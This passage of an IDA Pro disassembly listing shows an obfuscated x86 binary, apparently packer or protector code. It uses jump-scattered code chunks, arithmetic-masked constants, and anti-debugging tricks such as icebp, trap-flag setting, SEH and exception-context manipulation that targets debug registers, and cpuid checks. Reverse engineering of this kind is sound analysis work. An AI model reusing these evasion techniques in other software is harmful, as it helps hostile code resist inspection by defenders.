; sub_42798F:loc_428E77�j
add ebx, 0CC0D3DD4h
jmp loc_426836
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429957 proc near ; CODE XREF: sub_428F20-4A47�p
; _0182ofla:004256A8�j
; FUNCTION CHUNK AT 0042C47D SIZE 00000016 BYTES
xchg eax, [esp+0]
pop eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_42C47D
sub_429957 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_429966: ; CODE XREF: sub_4276BF-2DAA�j
jz loc_426DFA
jmp loc_42CA34
; END OF FUNCTION CHUNK FOR sub_4276BF
; ---------------------------------------------------------------------------
loc_429971: ; CODE XREF: _0182ofla:0042E6B4�j
pop edx
and edx, 49F97EA8h
cmp edx, 712EA524h
jmp loc_423832
; ---------------------------------------------------------------------------
loc_429983: ; DATA XREF: sub_424DE2+3�o
xchg edx, [esp]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42C4D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_429991: ; CODE XREF: sub_42D056:loc_428D92�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
jmp loc_42B3A8
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
loc_4299B6: ; CODE XREF: _0182ofla:0042E979�j
and ecx, eax
; =============== S U B R O U T I N E =======================================
sub_4299B8 proc near ; CODE XREF: sub_42380D+54A6�p
; FUNCTION CHUNK AT 0042ACED SIZE 00000009 BYTES
xchg esi, [esp+0]
pop esi
push 0D9346AADh
jmp loc_42ACED
sub_4299B8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_4299C6: ; CODE XREF: sub_42448C+5367�j
jz loc_428E0E
not esi
pop edx
jmp loc_42303F
; END OF FUNCTION CHUNK FOR sub_42448C
; =============== S U B R O U T I N E =======================================
sub_4299D4 proc near ; DATA XREF: sub_428EB9:loc_4269CF�o
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_427C1A
sub_4299D4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_4299E8: ; CODE XREF: sub_428EB9+C49�j
cmp dword ptr [ebp-10h], 2
jnz loc_427C1A
jmp loc_426F27
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4299F7: ; CODE XREF: sub_42798F+E1�j
; sub_424BCB:loc_42DBCD�j
mov eax, [ebp-0Ch]
call sub_42B15E
loc_4299FF: ; CODE XREF: sub_428D63:loc_42E189�j
jnz loc_42ABE9
loc_429A05: ; CODE XREF: sub_42E218:loc_42C841�j
jmp loc_42ABFE
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
ja loc_423DA2
jmp sub_424E36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_429A15: ; CODE XREF: sub_427ED1:loc_424503�j
add eax, 8BEF15B1h
mov eax, [eax]
push eax
call sub_42CA29
test eax, eax
jz loc_42CC44
jmp loc_424E99
; END OF FUNCTION CHUNK FOR sub_427ED1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_429A30: ; CODE XREF: sub_4253F4:loc_423554�j
; _0182ofla:loc_42A111�j
mov ecx, [edx]
popf
jl loc_428E46
jnp loc_42B2B6
jmp loc_4274F2
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_429A44: ; CODE XREF: sub_428D63-1A9�j
xor edx, edi
sbb edx, 0C2F6ED5Fh
jmp loc_42B34B
; ---------------------------------------------------------------------------
loc_429A51: ; CODE XREF: sub_428D63-2EC3�j
adc ebp, esi
loc_429A53: ; CODE XREF: sub_4253F4:loc_425E91�j
sub edi, 4EB32E9Ch
test edi, 40000h
jmp loc_42DE10
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_429A64 proc near ; CODE XREF: _0182ofla:00426BB0�j
; sub_42ECAD+9�p
; FUNCTION CHUNK AT 00425C49 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426CBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E24 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B3BD SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add esp, 0FFFFFFF8h
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
jz loc_427E24
mov dword ptr [ebp-8], 1
jmp loc_426CBD
sub_429A64 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sbb edx, ebp
jmp sub_42DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_429A8B: ; CODE XREF: sub_428F20+3230�j
adc edx, 3E28B8BAh
test esi, edi
jmp loc_42AB80
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_429A98 proc near ; CODE XREF: sub_424157+3�p
; _0182ofla:0042911A�j
xchg ecx, [esp+0]
pop ecx
mov dword ptr [edx], 1000h
sub_429A98 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AA3 proc near ; CODE XREF: sub_423A2A+DAB�j
; _0182ofla:loc_42A2E0�j ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004248AE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425D5E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D709 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_42D709
sub_429AA3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429AAB: ; CODE XREF: _0182ofla:0042E454�j
jns loc_42D0C3
; =============== S U B R O U T I N E =======================================
sub_429AB1 proc near ; CODE XREF: sub_42349B+20A3�j
; sub_42448C+537B�p
; FUNCTION CHUNK AT 0042674E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042831F SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
push eax
jmp loc_42674E
sub_429AB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429ABB: ; CODE XREF: sub_42798F:loc_42EC8D�j
jz loc_42620C
jmp loc_429D0B
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_429AC6 proc near ; CODE XREF: _0182ofla:0042B21E�p
; _0182ofla:0042C73E�j
; FUNCTION CHUNK AT 0042A0E4 SIZE 0000000C BYTES
xchg edx, [esp+0]
pop edx
add eax, ebp
push ecx
push 76381FE2h
pop ecx
add ecx, 1D2E7B0Fh
add eax, ecx
jmp loc_42A0E4
sub_429AC6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429AE0 proc near ; CODE XREF: _0182ofla:004239B8�j
; sub_42A3E4+3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423579 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425027 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A7EE SIZE 0000000F BYTES
mov [esp+0], esi
pop esi
push ebx
push edi
mov edi, ecx
xchg edi, [esp+4+var_4]
xchg esi, ebx
push edi
jmp loc_423579
sub_429AE0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429AF4: ; CODE XREF: _0182ofla:0042DF04�j
jmp loc_428A4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429AF9: ; CODE XREF: sub_42798F-2FE9�j
jmp loc_4286D9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_429AFE: ; CODE XREF: sub_428EB9-5C8A�j
cmp dword ptr [ebp-10h], 1
jnz loc_4299E8
mov eax, [ebp+8]
jmp loc_426713
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_429B10: ; CODE XREF: sub_424707+280C�j
sbb ebx, ebp
jl loc_424E05
add edx, 54AD398Ah
loc_429B1E: ; CODE XREF: sub_428D63:loc_42B34B�j
jmp loc_4274C0
; END OF FUNCTION CHUNK FOR sub_424707
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429B24: ; CODE XREF: _0182ofla:00426738�j
jmp loc_429FE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_429B29: ; CODE XREF: sub_4249FA:loc_42AA2E�j
push 1C45F770h
pop eax
rol eax, 1Bh
add eax, 7F603FFDh
mov eax, [eax]
or eax, eax
jnz loc_425512
jmp loc_42C1E0
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E395
loc_429B47: ; CODE XREF: sub_42E395:loc_42B384�j
add esi, 528757F4h
add esi, ebp
add esi, 6AAF95A6h
mov [esi], eax
pop esi
cmp dword ptr [ebp-8], 0
jz loc_42A9F2
push 0
jmp loc_425881
; END OF FUNCTION CHUNK FOR sub_42E395
; =============== S U B R O U T I N E =======================================
sub_429B69 proc near ; CODE XREF: sub_42C1B2-7A63�p
; _0182ofla:004281D9�p
; FUNCTION CHUNK AT 00423B8E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D3C4 SIZE 00000005 BYTES
mov eax, ds:dword_42577C
or eax, eax
jnz loc_42C895
jmp loc_42D3C4
sub_429B69 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_429B7C: ; CODE XREF: sub_424E6E-1D0D�j
add ecx, 4
mov dword ptr [ecx], offset loc_4274C8
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_429B8C: ; CODE XREF: sub_42EAB7-526D�j
jmp loc_42A9AC
; END OF FUNCTION CHUNK FOR sub_42EAB7
; =============== S U B R O U T I N E =======================================
sub_429B91 proc near ; CODE XREF: sub_424707+7E2B�p
push dword ptr fs:0
mov fs:0, esp
jmp near ptr byte_42E7D5
sub_429B91 endp
; =============== S U B R O U T I N E =======================================
sub_429BA2 proc near ; CODE XREF: _0182ofla:0042CB70�p
mov [esp+0], eax
ror eax, 9
mov ds:dword_42D210, eax
retn
sub_429BA2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429BAF: ; CODE XREF: sub_42798F-1D0C�j
jmp loc_428FC1
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425418
loc_429BB4: ; CODE XREF: sub_425418+C�j
jmp loc_4246BE
; END OF FUNCTION CHUNK FOR sub_425418
; =============== S U B R O U T I N E =======================================
sub_429BB9 proc near ; CODE XREF: sub_42D730-A5BA�p
; sub_428F46:loc_426A11�p ...
; FUNCTION CHUNK AT 004230A0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042EB60 SIZE 00000009 BYTES
call sub_423B53
loc_429BBE: ; CODE XREF: _0182ofla:loc_428AF4�j
jnz loc_4230A2
jmp loc_42EB60
sub_429BB9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_429BC9: ; CODE XREF: sub_4253F4+2426�j
ror ebx, 1Dh
adc esi, ebp
jmp loc_42D623
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_429BD3: ; DATA XREF: _0182ofla:00424BC2�o
pop ebp
jmp loc_42EC82
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
call sub_4267F8
; START OF FUNCTION CHUNK FOR sub_42E1DA
loc_429BE2: ; CODE XREF: sub_42E1DA+11�j
jmp loc_42822F
; END OF FUNCTION CHUNK FOR sub_42E1DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_429BE7: ; CODE XREF: sub_42448C-2D4�j
jmp nullsub_62
; END OF FUNCTION CHUNK FOR sub_42448C
; =============== S U B R O U T I N E =======================================
sub_429BEC proc near ; CODE XREF: _0182ofla:00428302�j
; sub_42E2EE+5�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042335B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425264 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426EEC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004275F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429816 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A125 SIZE 00000027 BYTES
mov [esp+0], esi
pop esi
jnz loc_426EEC
push ecx
mov ecx, [esp+8+arg_4]
mov dword ptr [ecx], 10001h
lea eax, loc_42DD4D
push ebx
jmp loc_4275F1
sub_429BEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E395
loc_429C0D: ; CODE XREF: sub_42E395:loc_425881�j
push 0
push 10h
mov eax, [ebp-8]
push eax
jmp loc_4274DE
; END OF FUNCTION CHUNK FOR sub_42E395
; =============== S U B R O U T I N E =======================================
sub_429C1A proc near ; CODE XREF: sub_42AB27+3�j
; FUNCTION CHUNK AT 00424C7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004261D1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042E10D SIZE 0000000E BYTES
add esp, 0FFFFFFE0h
lea eax, [ebp-20h]
jmp loc_4261D1
sub_429C1A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429C26: ; CODE XREF: _0182ofla:0042411D�j
jnz loc_42C81D
jmp loc_4242A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_429C31: ; CODE XREF: sub_4271D2+353F�j
; sub_4271D2:loc_42B696�j
call sub_428D17
mov edx, 0F75CA70h
call sub_42D71D
push ebp
mov ebp, eax
jmp loc_42C695
; END OF FUNCTION CHUNK FOR sub_4271D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_429C49: ; CODE XREF: sub_42D056:loc_42D425�j
pop ebp
mov eax, ds:dword_424C18
or eax, eax
jnz loc_424F26
jmp loc_42ECC5
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
jge loc_427453
jmp loc_428C77
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C68 proc near ; CODE XREF: sub_428FD6�j
; FUNCTION CHUNK AT 00427EF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A2CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E463 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E70E SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42A2CA
sub_429C68 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_429C74: ; CODE XREF: sub_4249FA:loc_4235B8�j
pushf
mov [esp+0], eax
push edi
push 430B203h
pop edi
sub edi, 6C734E7Bh
rol edi, 7
add edi, 2190D18Ah
jmp loc_425F81
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_429C93: ; CODE XREF: sub_4253DC:loc_42A03C�j
jz loc_429480
jmp loc_423BCC
; END OF FUNCTION CHUNK FOR sub_4253DC
; ---------------------------------------------------------------------------
add eax, 0C5DDBA37h
cmp edx, 7B9A58E2h
jmp loc_42B54D
; ---------------------------------------------------------------------------
loc_429CAF: ; CODE XREF: _0182ofla:loc_425467�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
xor eax, eax
add ecx, 4
jmp loc_426161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_429CCC: ; CODE XREF: sub_428F20-3492�j
add eax, 0CC328E41h
add eax, ebp
add eax, 0D590283h
call sub_429038
loc_429CDF: ; CODE XREF: sub_428A39+2C7D�j
jmp loc_426415
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_429CE4: ; CODE XREF: sub_423FE2:loc_42DE16�j
jnz loc_4289ED
jmp loc_423FD8
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
sbb ebx, esi
jmp loc_4269F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_429CF6: ; CODE XREF: sub_428AC9:loc_42A45B�j
cmp dword ptr [ebp-8], 0
jz loc_424680
jmp loc_42EB23
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
locret_429D05: ; CODE XREF: _0182ofla:004245C5�j
retn
; ---------------------------------------------------------------------------
loc_429D06: ; CODE XREF: _0182ofla:0042E7BF�j
jmp loc_423333
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429D0B: ; CODE XREF: sub_42798F+2132�j
jnz loc_424A08
jmp loc_42D90E
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ACCF
loc_429D17: ; CODE XREF: sub_42ACCF+E�j
jmp locret_42906B
; END OF FUNCTION CHUNK FOR sub_42ACCF
; =============== S U B R O U T I N E =======================================
sub_429D1C proc near ; CODE XREF: sub_428265:loc_42323A�p
; sub_42DFBB+13�j
mov [esp+0], esi
pop esi
mov [ebp-5], al
sub_429D1C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429D23: ; CODE XREF: sub_42C415-72FA�j
; sub_42537E+8�j ...
js loc_42DAD3
cmp byte ptr [ebp-5], 0
jnz loc_426069
jmp loc_42B8CF
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
sbb edx, ebx
jmp loc_42C995
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_429D40: ; CODE XREF: sub_428041-26CC�j
jmp loc_42DC71
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
loc_429D45: ; CODE XREF: _0182ofla:00425480�j
jmp locret_4240CB
; ---------------------------------------------------------------------------
mov edx, 0BB931B55h
call sub_42D71D
xchg eax, ebp
push ebp
xchg eax, ebp
ror eax, 14h
jmp loc_42E478
; ---------------------------------------------------------------------------
loc_429D61: ; DATA XREF: _0182ofla:loc_42A56A�o
add eax, [esp]
adc edx, [esp+4]
js loc_42B81C
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_4289E4
cmp eax, [ebp-8]
jmp loc_428171
; =============== S U B R O U T I N E =======================================
sub_429D83 proc near ; CODE XREF: _0182ofla:0042C9BA�j
; sub_42DFBB+8�p
; FUNCTION CHUNK AT 00426A33 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A9ED SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
jnz loc_426A33
push offset loc_42523C
jmp loc_42A9ED
sub_429D83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429D98: ; CODE XREF: sub_42798F:loc_42A1F9�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
jmp loc_42DA48
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429DB6: ; CODE XREF: _0182ofla:loc_424C12�j
xchg ecx, [esp]
jmp sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_429DBE: ; CODE XREF: sub_42C718+C�j
pushf
jmp loc_4290E6
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B43
loc_429DC4: ; CODE XREF: sub_423B43+97C1�j
jz loc_425F7E
jmp loc_42B228
; END OF FUNCTION CHUNK FOR sub_423B43
; =============== S U B R O U T I N E =======================================
sub_429DCF proc near ; CODE XREF: sub_427445+B8B�p
; _0182ofla:0042E25D�j
xchg ebx, [esp+0]
pop ebx
add eax, 0F4199E59h
call sub_42380D
loc_429DDE: ; CODE XREF: sub_428D63+116B�j
jmp loc_42D629
sub_429DCF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_429DE3: ; CODE XREF: sub_42C379:loc_42D234�j
call sub_429F6C
loc_429DE8: ; CODE XREF: sub_42EB7D+F�j
jmp loc_42E22F
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429DED: ; CODE XREF: sub_42798F:loc_424BFC�j
movzx edx, byte ptr [ecx+edx]
and eax, edx
jz loc_42620C
jmp loc_425663
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_429DFE: ; CODE XREF: _0182ofla:00425FB6�j
add eax, [ebp-4]
xor edx, edx
push edx
jmp loc_4286CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231D5
loc_429E09: ; CODE XREF: sub_4231D5+A�j
call sub_4240FC
loc_429E0E: ; CODE XREF: sub_42D8EA:loc_42C5BB�j
call sub_428D17
mov edx, 0A2CD59D9h
call sub_42B097
push offset sub_42745F
jmp nullsub_84
; END OF FUNCTION CHUNK FOR sub_4231D5
; ---------------------------------------------------------------------------
db 3
dd 51FD81D0h, 0E955ACD0h, 0FFFFB084h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_429E34: ; CODE XREF: sub_4253F4+5C3�j
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
and edx, 0FFFFFDFFh
xor [esi], edx
jmp loc_425291
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_429E4C: ; CODE XREF: _0182ofla:loc_42DA71�j
push eax
jmp loc_425A47
; =============== S U B R O U T I N E =======================================
sub_429E52 proc near ; CODE XREF: _0182ofla:0042D685�j
; sub_42D875+A�p
; FUNCTION CHUNK AT 004237FE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423B99 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424169 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042468A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042483C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424D77 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424E11 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042546C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425520 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425939 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042613E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426966 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004281EB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428634 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429568 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00429F79 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A956 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042AB13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AB75 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B0D3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042C109 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_423B99
sub_429E52 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_429E67: ; CODE XREF: sub_4298DD-46FD�j
push ecx
test edi, 6CA72CCBh
jmp loc_427315
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A092
loc_429E73: ; CODE XREF: sub_42A092+10�j
jz loc_42A786
jmp loc_42D29A
; END OF FUNCTION CHUNK FOR sub_42A092
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_429E7E: ; CODE XREF: sub_42D056:loc_429319�j
jg loc_424379
xor edi, ebx
mov ebp, ecx
and ecx, ebp
jmp loc_4263AD
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_429E8F: ; CODE XREF: sub_42B3C2:loc_426AF0�j
lock icebp
jmp loc_42DF3C
; END OF FUNCTION CHUNK FOR sub_42B3C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6D5
loc_429E96: ; CODE XREF: sub_42A6D5:loc_4278EA�j
xchg eax, [esp+8+var_8]
or eax, 100h
xchg eax, [esp+8+var_8]
popf
nop
jmp loc_4243FD
; END OF FUNCTION CHUNK FOR sub_42A6D5
; =============== S U B R O U T I N E =======================================
sub_429EA9 proc near ; CODE XREF: sub_429F53:loc_4263D5�j
add esp, 0FFFFF7ECh
push offset sub_42D52E
jmp nullsub_202
sub_429EA9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_429EB9: ; CODE XREF: sub_429203-3C6E�j
xchg edi, [esp+0]
jmp loc_42E5CE
; END OF FUNCTION CHUNK FOR sub_429203
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_429EC1: ; CODE XREF: _0182ofla:00423766�j
; sub_428D63:loc_42841D�j
add edi, 0E5032DA3h
and ebx, edi
pop edi
add [esi], ebx
xor [esi], edx
jmp loc_429DDE
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_429ED3 proc near ; CODE XREF: sub_429AA3-51E9�p
; sub_42EAFE:loc_42C6D6�j
; FUNCTION CHUNK AT 0042A19B SIZE 0000000A BYTES
push 44EAA2C8h
jmp loc_42A19B
sub_429ED3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_429EDD: ; CODE XREF: sub_42E5F8:loc_42D477�j
pop edi
add edi, 722B7645h
add edi, ebp
add edi, 0A7D6C6B3h
mov [edi], eax
pop edi
mov eax, [ebp-4]
jmp loc_425F1A
; END OF FUNCTION CHUNK FOR sub_42E5F8
; =============== S U B R O U T I N E =======================================
sub_429EF7 proc near ; DATA XREF: sub_4238A3+9�o
push eax
ror eax, 19h
push ebx
push 2620FE29h
pop ebx
call sub_426295
sub_429EF7 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428FED
loc_429F07: ; CODE XREF: sub_428FED+A�j
jmp loc_425AF6
; END OF FUNCTION CHUNK FOR sub_428FED
; ---------------------------------------------------------------------------
loc_429F0C: ; CODE XREF: _0182ofla:00427181�j
jmp sub_428D09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_429F11: ; CODE XREF: sub_425BF8:loc_427EF9�j
jnz sub_42DB2E
jmp loc_424816
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
loc_429F1C: ; CODE XREF: _0182ofla:loc_42A4BB�j
jnz loc_423436
jmp loc_42C2E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_429F27: ; CODE XREF: sub_424707+6�j
add ebx, 0DD8D4C0Ch
add edx, eax
ror edx, 17h
adc eax, 87952B2Ah
jmp loc_426F03
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
and ecx, 589D8616h
jmp sub_42E79C
; ---------------------------------------------------------------------------
loc_429F48: ; CODE XREF: _0182ofla:0042A66B�j
; _0182ofla:loc_42A840�j
call sub_429F53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_429F4E: ; CODE XREF: sub_423F50+509�j
jmp loc_42654E
; END OF FUNCTION CHUNK FOR sub_423F50
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
